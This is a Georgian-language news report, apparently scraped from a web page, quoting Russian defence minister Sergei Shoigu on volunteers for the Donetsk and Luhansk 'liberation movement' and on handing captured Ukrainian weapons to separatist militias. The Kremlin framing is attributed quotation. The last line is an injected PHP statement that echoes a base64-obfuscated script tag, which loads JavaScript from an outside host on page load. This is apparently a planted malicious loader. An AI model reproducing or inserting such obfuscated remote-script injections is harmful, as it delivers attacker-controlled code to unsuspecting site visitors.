celsiusi
ავერსი საქკაბელი
ყველაფერი გეგმის მიხედვით მიდის, - ამის შესახებ რუსეთის თავდაცვის მინისტრმა სერგეი შოიგუმ უშიშროების საბჭოს სხდომაზე განაცხადა.
 
შოიგუს თქმით, რუსეთი მოხალისეთა დიდი რაოდენობის განაცხადებს იღებენ სხვადასხვა ქვეყნიდან, რომელთაც სურთ, ლუგანსკისა და დონეცკის „განმათავისუფლებელ მოძრაობაში მონაწილეობა“.
 
„ყველაფერი მიდის გეგმის მიხედვით. ამის შესახებ ინფორმაციას მთელი კვირის მანძილზე, ყოველ დღე მოგახსენებთ. ჩვენ დიდი რაოდენობის განაცხადს ვიღებთ მოხალისეებისგან, სხვადასხვა ქვეყნიდან, რომელთაც სურთ, ჩავიდნენ ლუგანსკისა და დონეცკის სახალხო რესპუბლიკებში, რათა მონაწილეობა მიიღონ განმათავისუფლებელ მოძრაობაში“, - განაცხადა შოიგუმ.
 
ამასთან, როგორც შოიგუმ დასძინა, მათ უკრაინული იარაღის დიდი რაოდენობა დააგროვეს.
 
„ჩვენ დავაგროვეთ უკრაინული იარაღის დიდი რაოდენობა: ტანკები, ჯავშანტექნიკა და ყველანაირი სახის მცირე იარაღი, საკმაოდ დიდი არტილერია. ასევე Javelin და Stinger. არსებობს შემოთავაზება, რომ ეს იარაღი გადაეცეს დონეცკისა და ლუგანსკის რესპუბლიკებს, მილიციას, რათა უფრო ეფექტურად განახორციელონ საკუთარი რესპუბლიკების დაცვა“, - დასძინა შოიგუმ.
 
1053
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");